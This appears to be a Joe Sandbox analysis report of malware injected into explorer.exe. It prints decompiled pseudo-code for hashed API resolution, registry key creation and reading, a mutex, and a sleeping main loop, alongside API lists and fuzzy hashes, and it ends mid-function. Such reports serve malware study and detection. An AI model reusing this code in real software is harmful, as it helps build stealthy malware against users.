                            0x00086326
                            0x00086327
                            0x0008632a
                            0x0008632a
                            0x00000000
                            0x0008628d
                            0x0008626f
                            0x00086277
                            0x00000000

                            APIs
                            • memset.MSVCRT ref: 000861D2
                              • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                            • RegOpenKeyExW.KERNEL32(?,?,00000000,0002001F,?,?,?,00000001), ref: 0008622C
                            • memset.MSVCRT ref: 00086295
                            • memset.MSVCRT ref: 000862A2
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: memset$AllocateHeapOpen
                            • String ID:
                            • API String ID: 2508404634-0
                            • Opcode ID: 8a8df3ec20745d9b8db935e1207a51dcdf7b99798a4571e88c74bfd6093f7efc
                            • Instruction ID: 5df326356aa9df0f49ed8f656d01e6deee27922878838a2d55d254d8868e0780
                            • Opcode Fuzzy Hash: 8a8df3ec20745d9b8db935e1207a51dcdf7b99798a4571e88c74bfd6093f7efc
                            • Instruction Fuzzy Hash: 6C5128B1A00209AFEB51EF94CC85FEE7BBCBF04340F118069F545A7252DB759E048B60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008B012, Relevance: 6.1, APIs: 4, Instructions: 72stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 420 8b012-8b079 memset * 2 SHGetFolderPathW call 8b946 423 8b07c-8b07e 420->423 424 8b0ab-8b0dd call 8c392 lstrcpynW 423->424 425 8b080-8b094 call 8bb8d 423->425 425->424 429 8b096-8b0a7 425->429 429->424
                            C-Code - Quality: 87%
                            			E0008B012(void* __ecx, WCHAR* __edx) {
				int _v8;
				void _v528;
				char _v1046;
				void _v1048;
				intOrPtr _t21;
				intOrPtr* _t26;
				void* _t27;
				intOrPtr _t33;
				intOrPtr _t36;
				void* _t39;
				intOrPtr _t40;
				WCHAR* _t47;
				void* _t49;

				_t39 = __ecx;
				_v8 = 0x104;
				_t47 = __edx;
				memset( &_v1048, 0, 0x208);
				memset( &_v528, 0, 0x208);
				_t21 =  *0x9e698; // 0x286fbc8
				 *((intOrPtr*)(_t21 + 4))(0, 0x1a, 0, 1,  &_v1048);
				_t49 = E0008B946(_t39);
				_t26 =  *0x9e6b8; // 0x286fbd8
				_t27 =  *_t26(_t49,  &_v528,  &_v8); // executed
				if(_t27 == 0) {
					_t33 =  *0x9e688; // 0xb0000
					if(E0008BB8D( *((intOrPtr*)( *((intOrPtr*)(_t33 + 0x110))))) != 0) {
						_t36 =  *0x9e698; // 0x286fbc8
						 *((intOrPtr*)(_t36 + 4))(0, 0x24, 0, 1,  &_v528);
					}
				}
				_t40 =  *0x9e684; // 0x286f8f0
				 *((intOrPtr*)(_t40 + 0x30))(_t49);
				lstrcpynW(_t47,  &_v1046 + E0008C392( &_v528) * 2, 0x104);
				return 1;
			}
















                            0x0008b012
                            0x0008b023
                            0x0008b035
                            0x0008b037
                            0x0008b045
                            0x0008b054
                            0x0008b05f
                            0x0008b067
                            0x0008b074
                            0x0008b07a
                            0x0008b07e
                            0x0008b080
                            0x0008b094
                            0x0008b09d
                            0x0008b0a8
                            0x0008b0a8
                            0x0008b094
                            0x0008b0ab
                            0x0008b0b2
                            0x0008b0d0
                            0x0008b0dd

                            APIs
                            • memset.MSVCRT ref: 0008B037
                            • memset.MSVCRT ref: 0008B045
                            • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000001,?,?,?,?,?,?,00000000), ref: 0008B05F
                              • Part of subcall function 0008B946: GetCurrentThread.KERNEL32(00000008,00000000,10000000,00000000,?,?,0008BA7C,74EC17D9,10000000), ref: 0008B959
                              • Part of subcall function 0008B946: GetLastError.KERNEL32(?,?,0008BA7C,74EC17D9,10000000), ref: 0008B967
                              • Part of subcall function 0008B946: GetCurrentProcess.KERNEL32(00000008,10000000,?,?,0008BA7C,74EC17D9,10000000), ref: 0008B980
                            • lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,00000000), ref: 0008B0D0
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: Currentmemset$ErrorFolderLastPathProcessThreadlstrcpyn
                            • String ID:
                            • API String ID: 3158470084-0
                            • Opcode ID: 3309cad5030584fc54aa8f49d31479e0ce1f2041df6bd5106adfde4e1a117ce7
                            • Instruction ID: 19c7f563789c793ddff4382733eb78b8a69f152fd9c3ce08f6bae5569c2b2d08
                            • Opcode Fuzzy Hash: 3309cad5030584fc54aa8f49d31479e0ce1f2041df6bd5106adfde4e1a117ce7
                            • Instruction Fuzzy Hash: FA218EB2501218BFE710EBA4DCC9EDB77BCBB49354F1040A5F20AD7192EB749E458B60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008BF37, Relevance: 6.1, APIs: 4, Instructions: 72registryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 432 8bf37-8bf66 RegOpenKeyExW 433 8bf68-8bf6a 432->433 434 8bf6c-8bf8a RegQueryValueExW 432->434 435 8bfda-8bfdc 433->435 436 8bf8c-8bf9c call 88604 434->436 437 8bfc7-8bfca 434->437 436->437 443 8bf9e-8bfb8 RegQueryValueExW 436->443 438 8bfcc-8bfd1 437->438 439 8bfd7 437->439 438->439 441 8bfd9 439->441 441->435 444 8bfba-8bfc6 call 8861a 443->444 445 8bfdd-8bfea RegCloseKey 443->445 444->437 445->441
                            C-Code - Quality: 100%
                            			E0008BF37(short* __edx, short* _a4) {
				void* _v8;
				int _v12;
				int _v16;
				char* _v20;
				char* _t30;
				intOrPtr _t31;
				char* _t49;

				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				if(RegOpenKeyExW(0x80000002, __edx, 0, 0x20019,  &_v8) == 0) {
					if(RegQueryValueExW(_v8, _a4, 0,  &_v16, 0,  &_v12) != 0) {
						L6:
						if(_v8 != 0) {
							_t31 =  *0x9e68c; // 0x286fab8
							 *((intOrPtr*)(_t31 + 0x1c))(_v8);
						}
						_t30 = 0;
						L9:
						return _t30;
					}
					_t49 = E00088604(_v12);
					_v20 = _t49;
					if(_t49 == 0) {
						goto L6;
					}
					if(RegQueryValueExW(_v8, _a4, 0, 0, _t49,  &_v12) == 0) {
						RegCloseKey(_v8);
						_t30 = _t49;
						goto L9;
					}
					E0008861A( &_v20, 0xfffffffe);
					goto L6;
				}
				return 0;
			}










                            0x0008bf55
                            0x0008bf58
                            0x0008bf5b
                            0x0008bf66
                            0x0008bf8a
                            0x0008bfc7
                            0x0008bfca
                            0x0008bfcc
                            0x0008bfd4
                            0x0008bfd4
                            0x0008bfd7
                            0x0008bfd9
                            0x00000000
                            0x0008bfd9
                            0x0008bf94
                            0x0008bf96
                            0x0008bf9c
                            0x00000000
                            0x00000000
                            0x0008bfb8
                            0x0008bfe5
                            0x0008bfe8
                            0x00000000
                            0x0008bfe8
                            0x0008bfc0
                            0x00000000
                            0x0008bfc6
                            0x00000000

                            APIs
                            • RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020019,00000000,00000000,?,?,00082C08,00000000), ref: 0008BF5E
                            • RegQueryValueExW.KERNEL32(00000000,00082C08,00000000,?,00000000,00082C08,00000000,?,?,00082C08,00000000), ref: 0008BF82
                            • RegQueryValueExW.KERNEL32(00000000,00082C08,00000000,00000000,00000000,00082C08,?,?,00082C08,00000000), ref: 0008BFB0
                            • RegCloseKey.KERNEL32(00000000,?,?,00082C08,00000000,?,?,?,?,?,?,?,000000AF,?), ref: 0008BFE5
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: QueryValue$CloseOpen
                            • String ID:
                            • API String ID: 1586453840-0
                            • Opcode ID: 7e5c6c0b12421700877791a8b1243c8e4f1c457698047c2e59d80b208f0cb83c
                            • Instruction ID: 30ccd786ff8b7b84f14da17d4d39020c4d4bce544ae74224a6a2efcb0f455484
                            • Opcode Fuzzy Hash: 7e5c6c0b12421700877791a8b1243c8e4f1c457698047c2e59d80b208f0cb83c
                            • Instruction Fuzzy Hash: 3121E8B6900118FFDB50EBA9DC48E9EBBF8FF88750B1541AAF645E6162D7309A00DB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008BE9B, Relevance: 6.1, APIs: 4, Instructions: 69registryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 448 8be9b-8bec3 RegOpenKeyExA 449 8bec9-8bee6 RegQueryValueExA 448->449 450 8bec5-8bec7 448->450 452 8bee8-8bef7 call 88604 449->452 453 8bf21-8bf24 449->453 451 8bf33-8bf36 450->451 452->453 458 8bef9-8bf13 RegQueryValueExA 452->458 455 8bf31 453->455 456 8bf26-8bf2e RegCloseKey 453->456 455->451 456->455 458->453 459 8bf15-8bf1a 458->459 459->453 460 8bf1c-8bf1f 459->460 460->453
                            C-Code - Quality: 100%
                            			E0008BE9B(void* __ecx, char* __edx, char* _a4, intOrPtr* _a12) {
				void* _v8;
				int _v12;
				int _v16;
				intOrPtr* _t43;
				char* _t46;

				_t46 = 0;
				_v8 = 0;
				_v16 = 0;
				if(RegOpenKeyExA(__ecx, __edx, 0, 0x20019,  &_v8) != 0) {
					return 0;
				}
				_v12 = 0;
				if(RegQueryValueExA(_v8, _a4, 0,  &_v16, 0,  &_v12) == 0) {
					_t46 = E00088604(_v12 + 1);
					if(_t46 != 0 && RegQueryValueExA(_v8, _a4, 0,  &_v16, _t46,  &_v12) == 0) {
						_t43 = _a12;
						if(_t43 != 0) {
							 *_t43 = _v12;
						}
					}
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				return _t46;
			}








                            0x0008beae
                            0x0008beb8
                            0x0008bebb
                            0x0008bec3
                            0x00000000
                            0x0008bec5
                            0x0008becc
                            0x0008bee6
                            0x0008bef2
                            0x0008bef7
                            0x0008bf15
                            0x0008bf1a
                            0x0008bf1f
                            0x0008bf1f
                            0x0008bf1a
                            0x0008bef7
                            0x0008bf24
                            0x0008bf2e
                            0x0008bf2e
                            0x00000000

                            APIs
                            • RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,0286FC18,00000000,?,00000002), ref: 0008BEBE
                            • RegQueryValueExA.KERNEL32(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 0008BEE1
                            • RegQueryValueExA.KERNEL32(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 0008BF0E
                            • RegCloseKey.KERNEL32(?,?,00000002), ref: 0008BF2E
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: QueryValue$CloseOpen
                            • String ID:
                            • API String ID: 1586453840-0
                            • Opcode ID: 7a4cdaf7386973441e4760f86288c6c940ee8b5e5eb7e5f1cc676981f8255861
                            • Instruction ID: a503bc69bf056dc60d578d60e72969ac8cbe77b2aa393cc8f9a4dd6054926014
                            • Opcode Fuzzy Hash: 7a4cdaf7386973441e4760f86288c6c940ee8b5e5eb7e5f1cc676981f8255861
                            • Instruction Fuzzy Hash: 0921A4B5A00148BF9B61DFA9DC44DAEBBF8FF98740B1141A9B945E7211D7309E00DB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00085631, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97sleepsynchronizationCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            C-Code - Quality: 78%
                            			E00085631(void* __edx, void* __edi) {
				char _v44;
				void* _t8;
				intOrPtr _t11;
				intOrPtr _t14;
				intOrPtr _t17;
				intOrPtr _t18;
				void* _t20;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t39;
				void* _t40;
				void* _t49;
				void* _t54;

				_t54 = __edi;
				_t8 = E00089E66(0x3b); // executed
				if(_t8 != 0xffffffff) {
					L2:
					E0008980C(0x9e6c8);
					_t39 = 0x37; // executed
					E00089F06(_t39);
					_t11 =  *0x9e688; // 0xb0000
					_t40 = 0x3a; // executed
					E00089F06(_t40); // executed
					E0008E4C1(_t63);
					_t14 =  *0x9e688; // 0xb0000
					_t41 =  &_v44;
					_t52 =  *((intOrPtr*)(_t14 + 0xac)) + 2;
					E0008A86D( &_v44,  *((intOrPtr*)(_t14 + 0xac)) + 2, _t63);
					_t17 =  *0x9e684; // 0x286f8f0
					_t18 =  *((intOrPtr*)(_t17 + 0xc4))(0, 0, 0,  &_v44,  *((intOrPtr*)(_t11 + 0x1640)), 0,  *0x9e6c8,  *0x9e6cc);
					 *0x9e74c = _t18;
					if(_t18 != 0) {
						_t20 = CreateMutexA(0, 0, 0);
						 *0x9e76c = _t20;
						__eflags = _t20;
						if(_t20 != 0) {
							_t34 = E00088604(0x1000);
							_t52 = 0;
							 *0x9e770 = _t34;
							_t49 =  *0x9e774; // 0x2
							__eflags = _t34;
							_t41 =  !=  ? 0 : _t49;
							__eflags = _t41;
							 *0x9e774 = _t41; // executed
						}
						E0008153B(_t41, _t52); // executed
						E000898EE(E00082EDA, 0, __eflags, 0, 0); // executed
						E00083017(); // executed
						E000831C2(0, __eflags); // executed
						E000829B1(); // executed
						E00083BB2(_t54, __eflags); // executed
						while(1) {
							__eflags =  *0x9e758; // 0x0
							if(__eflags != 0) {
								break;
							}
							E0008980C(0x9e750);
							_push(0x9e750);
							_push(0x9e750); // executed
							E0008279B();
							Sleep(0xfa0);
						}
						E00083D34();
						E00089A8E();
						E000834CB();
						_t33 = 0;
						__eflags = 0;
					} else {
						goto L3;
					}
				} else {
					_t36 = E00082DCB();
					_t63 = _t36;
					if(_t36 != 0) {
						L3:
						_t33 = 1;
					} else {
						goto L2;
					}
				}
				return _t33;
			}

















                            0x00085631
                            0x0008563d
                            0x00085646
                            0x00085651
                            0x00085656
                            0x00085669
                            0x0008566a
                            0x0008566f
                            0x0008567f
                            0x00085680
                            0x00085688
                            0x0008568d
                            0x00085692
                            0x0008569c
                            0x0008569f
                            0x000856a9
                            0x000856b1
                            0x000856b7
                            0x000856be
                            0x000856d0
                            0x000856d6
                            0x000856db
                            0x000856dd
                            0x000856e4
                            0x000856e9
                            0x000856eb
                            0x000856f1
                            0x000856f7
                            0x000856f9
                            0x000856f9
                            0x000856fc
                            0x000856fc
                            0x00085702
                            0x00085710
                            0x00085717
                            0x0008571c
                            0x00085721
                            0x00085726
                            0x00085750
                            0x00085750
                            0x00085756
                            0x00000000
                            0x00000000
                            0x00085732
                            0x00085737
                            0x00085738
                            0x00085739
                            0x0008574a
                            0x0008574a
                            0x00085758
                            0x0008575d
                            0x00085762
                            0x00085767
                            0x00085767
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00085648
                            0x00085648
                            0x0008564d
                            0x0008564f
                            0x000856c0
                            0x000856c2
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0008564f
                            0x0008576d

                            APIs
                            • CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 000856D0
                              • Part of subcall function 0008980C: GetSystemTimeAsFileTime.KERNEL32(?,?,00085FAF), ref: 00089819
                              • Part of subcall function 0008980C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00089839
                            • Sleep.KERNELBASE(00000FA0), ref: 0008574A
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: Time$CreateFileMutexSleepSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                            • String ID: 7xSa
                            • API String ID: 3249252070-3178854837
                            • Opcode ID: 3562f7877b88b9be417dacf07b104c639c27ee61355e5b92e6b06fab33a1451d
                            • Instruction ID: 618d9e32d6944c2961c1c58ef027407fe41e2fb87ac27e57644674ab890b217f
                            • Opcode Fuzzy Hash: 3562f7877b88b9be417dacf07b104c639c27ee61355e5b92e6b06fab33a1451d
                            • Instruction Fuzzy Hash: 0031D6312056509BF724FBB5EC069EA3B99FF557A0B144126F5C9861A3EE349900C763
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008DFAD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95libraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 511 8dfad-8dfc4 512 8e021 511->512 513 8dfc6-8dfee 511->513 515 8e023-8e027 512->515 513->512 514 8dff0-8e013 call 8c379 call 8d400 513->514 520 8e028-8e03f 514->520 521 8e015-8e01f 514->521 522 8e041-8e049 520->522 523 8e095-8e097 520->523 521->512 521->514 522->523 524 8e04b 522->524 523->515 525 8e04d-8e053 524->525 526 8e063-8e074 525->526 527 8e055-8e057 525->527 529 8e079-8e085 LoadLibraryA 526->529 530 8e076-8e077 526->530 527->526 528 8e059-8e061 527->528 528->525 528->526 529->512 531 8e087-8e091 GetProcAddress 529->531 530->529 531->512 532 8e093 531->532 532->515
                            C-Code - Quality: 100%
                            			E0008DFAD(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E0008D400( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E0008C379( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

























                            0x0008dfb6
                            0x0008dfb8
                            0x0008dfbb
                            0x0008dfbe
                            0x0008dfc4
                            0x0008e021
                            0x00000000
                            0x0008e021
                            0x0008dfc6
                            0x0008dfd1
                            0x0008dfd4
                            0x0008dfd9
                            0x0008dfde
                            0x0008dfe1
                            0x0008dfe3
                            0x0008dfe6
                            0x0008dfe9
                            0x0008dfee
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0008dff0
                            0x0008dff0
                            0x0008e002
                            0x0008e00f
                            0x0008e013
                            0x00000000
                            0x00000000
                            0x0008e015
                            0x0008e018
                            0x0008e019
                            0x0008e01f
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0008e01f
                            0x0008e036
                            0x0008e03b
                            0x0008e03f
                            0x00000000
                            0x0008e04b
                            0x0008e04b
                            0x0008e04d
                            0x0008e04d
                            0x0008e053
                            0x00000000
                            0x00000000
                            0x0008e059
                            0x0008e05d
                            0x0008e061
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0008e061
                            0x0008e067
                            0x0008e06f
                            0x0008e074
                            0x0008e077
                            0x0008e077
                            0x0008e079
                            0x0008e07d
                            0x0008e085
                            0x00000000
                            0x00000000
                            0x0008e089
                            0x0008e091
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0008e091

                            APIs
                            • LoadLibraryA.KERNEL32(.dll), ref: 0008E07D
                            • GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 0008E089
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: .dll
                            • API String ID: 2574300362-2738580789
                            • Opcode ID: 6b3667d21c83c631e7308aa9a773b73a335c260cf3743c54930195356ac01f65
                            • Instruction ID: 961bbec8ee8d513a9e7f355b8d92f0886381f3dfd6057b13809224bdd72c88db
                            • Opcode Fuzzy Hash: 6b3667d21c83c631e7308aa9a773b73a335c260cf3743c54930195356ac01f65
                            • Instruction Fuzzy Hash: 6F310631A001458BCB25EFADC884BAEBBF5BF44304F280869D981D7352DB70EC81CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00089B43, Relevance: 4.8, APIs: 3, Instructions: 254COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 533 89b43-89b75 call 88604 536 89b7e-89b9e call 8b5f6 533->536 537 89b77-89b79 533->537 541 89ba0 536->541 542 89ba3-89bb8 call 895c7 536->542 538 89e1a-89e1e 537->538 541->542 545 89cee-89cfb 542->545 546 89bbe-89bd6 542->546 547 89d3c-89d4c call 89292 545->547 548 89cfd-89d1e 545->548 551 89ceb 546->551 552 89bdc-89bf8 546->552 555 89d4f-89d51 547->555 556 89d20-89d3a call 89292 548->556 557 89d54-89d74 call 885c2 RegOpenKeyExA 548->557 551->545 552->557 562 89bfe-89c18 call 89292 552->562 555->557 556->555 564 89dc8-89dcd 557->564 565 89d76-89d8b RegCreateKeyA 557->565 568 89d8d-89db2 call 8861a memset call 8861a 562->568 574 89c1e-89c36 562->574 570 89dcf 564->570 571 89dd5 564->571 567 89dba-89dbf 565->567 565->568 575 89dc1 567->575 576 89dc3-89dc6 567->576 568->567 570->571 572 89dd8-89df4 call 8c379 571->572 587 89e0b-89e18 call 8861a 572->587 588 89df6-89e09 572->588 583 89c38-89c7c call 895e1 call 892e5 call 885d5 call 89256 574->583 584 89cab-89cb0 574->584 575->576 576->572 605 89c8b-89ca9 call 8861a * 2 583->605 606 89c7e-89c83 583->606 590 89cb6-89ce9 call 89292 call 8861a 584->590 587->538 588->587 588->588 590->557 605->590 606->605 607 89c85 606->607 607->605
                            C-Code - Quality: 89%
                            			E00089B43(char __ecx, int __edx, void* __fp0, int* _a4, int* _a8, int* _a12) {
				void* _v8;
				int _v12;
				void* _v16;
				void* _v20;
				int _v24;
				void* _v28;
				char _v32;
				char _v36;
				int* _v40;
				int** _v44;
				void _v108;
				int* _t90;
				void* _t91;
				char* _t92;
				long _t96;
				int* _t97;
				intOrPtr _t98;
				int* _t101;
				long _t111;
				int* _t112;
				intOrPtr _t122;
				char* _t125;
				intOrPtr _t126;
				intOrPtr _t128;
				int* _t129;
				intOrPtr _t131;
				int* _t133;
				intOrPtr _t134;
				int* _t135;
				intOrPtr _t136;
				char* _t139;
				int _t143;
				int _t147;
				intOrPtr _t148;
				int* _t149;
				int* _t154;
				int** _t155;
				int* _t161;
				int* _t163;
				intOrPtr _t164;
				intOrPtr _t171;
				int _t176;
				char* _t177;
				char* _t178;
				char _t179;
				void* _t180;
				void* _t181;
				void* _t183;

				_t176 = 0;
				_v24 = __edx;
				_t177 = 0;
				_v32 = __ecx;
				_v28 = 0;
				_v8 = 0x80000001;
				_v20 = 0;
				_t155 = E00088604(0x110);
				_v44 = _t155;
				if(_t155 != 0) {
					_t158 = _a4;
					_t155[0x42] = _a4;
					E0008B5F6(_a4, __edx, __eflags, __fp0, _t158,  &_v108);
					_t161 = _v108;
					__eflags = _t161 - 0x61 - 0x19;
					_t90 = _t161;
					if(_t161 - 0x61 <= 0x19) {
						_t90 = _t90 - 0x20;
						__eflags = _t90;
					}
					_v108 = _t90;
					_t91 = E000895C7(0x4d2);
					_t163 = _v24;
					_v16 = _t91;
					__eflags = _t163;
					if(_t163 == 0) {
						L16:
						_t164 =  *0x9e688; // 0xb0000
						__eflags =  *((intOrPtr*)(_t164 + 0x214)) - 3;
						if( *((intOrPtr*)(_t164 + 0x214)) != 3) {
							_push(_t176);
							_push( &_v108);
							_push("\\");
							_t92 = E00089292(_t91);
							_t181 = _t181 + 0x10;
							L20:
							_t177 = _t92;
							_v20 = _t177;
							goto L21;
						}
						_v24 = _t176;
						_v8 = 0x80000003;
						_t122 =  *0x9e68c; // 0x286fab8
						 *((intOrPtr*)(_t122 + 0x20))( *((intOrPtr*)( *((intOrPtr*)(_t164 + 0x110)))),  &_v24);
						__eflags = _v24 - _t177;
						if(_v24 == _t177) {
							goto L21;
						}
						_push(_t176);
						_push( &_v108);
						_t125 = "\\";
						_push(_t125);
						_push(_v16);
						_push(_t125);
						_t92 = E00089292(_v24);
						_t181 = _t181 + 0x18;
						goto L20;
					} else {
						_t126 =  *0x9e688; // 0xb0000
						_t128 =  *0x9e68c; // 0x286fab8
						_t129 =  *((intOrPtr*)(_t128 + 0x68))(_t163,  *((intOrPtr*)( *((intOrPtr*)(_t126 + 0x110)))));
						__eflags = _t129;
						if(_t129 != 0) {
							_t91 = _v16;
							goto L16;
						}
						_v12 = _t176;
						_t131 =  *0x9e68c; // 0x286fab8
						_v8 = 0x80000003;
						 *((intOrPtr*)(_t131 + 0x20))(_v24,  &_v12);
						__eflags = _v12 - _t177;
						if(_v12 == _t177) {
							L21:
							E000885C2( &_v16);
							_t96 = RegOpenKeyExA(_v8, _t177, _t176, 0x20019,  &_v28);
							__eflags = _t96;
							if(_t96 == 0) {
								_t97 = _a8;
								__eflags = _t97;
								if(_t97 != 0) {
									 *_t97 = 1;
								}
								_push(_v28);
								L30:
								_t98 =  *0x9e68c; // 0x286fab8
								 *((intOrPtr*)(_t98 + 0x1c))();
								_t155[0x43] = _v8;
								_t101 = E0008C379(_t177);
								 *_t155 = _t101;
								__eflags = _t101;
								if(_t101 == 0) {
									L32:
									E0008861A( &_v20, 0xffffffff);
									return _t155;
								} else {
									goto L31;
								}
								do {
									L31:
									 *(_t155 + _t176 + 4) =  *(_t180 + (_t176 & 0x00000003) + 8) ^ _t177[_t176];
									_t176 = _t176 + 1;
									__eflags = _t176 -  *_t155;
								} while (_t176 <  *_t155);
								goto L32;
							}
							_v16 = _t176;
							_t111 = RegCreateKeyA(_v8, _t177,  &_v16);
							__eflags = _t111;
							if(_t111 == 0) {
								_t112 = _a8;
								__eflags = _t112;
								if(_t112 != 0) {
									 *_t112 = _t176;
								}
								_push(_v16);
								goto L30;
							}
							L23:
							E0008861A( &_v44, 0x110);
							memset( &_v108, _t176, 0x40);
							E0008861A( &_v20, 0xffffffff);
							goto L1;
						}
						_push(_t176);
						_push(_v16);
						_t178 = "\\";
						_push(_t178);
						_t133 = E00089292(_v12);
						_t181 = _t181 + 0x10;
						_v40 = _t133;
						__eflags = _t133;
						if(_t133 == 0) {
							goto L23;
						}
						_t134 =  *0x9e68c; // 0x286fab8
						_t135 =  *((intOrPtr*)(_t134 + 0x14))(_v8, _t133, _t176, 0x20019,  &_v36);
						__eflags = _t135;
						if(_t135 == 0) {
							_t136 =  *0x9e68c; // 0x286fab8
							 *((intOrPtr*)(_t136 + 0x1c))(_v36);
						} else {
							_t143 = E000895E1( &_v36, 0x34);
							_v24 = _t143;
							_t179 = E000892E5(_v32);
							_v32 = _t179;
							E000885D5( &_v24);
							_t183 = _t181 + 0x18;
							_t147 = E00089256(_v12);
							_v24 = _t147;
							_t148 =  *0x9e68c; // 0x286fab8
							_t149 =  *((intOrPtr*)(_t148 + 0x30))(_v8, _t147, _t179, "\\", _t143, _t176);
							__eflags = _t149;
							if(_t149 == 0) {
								_t154 = _a12;
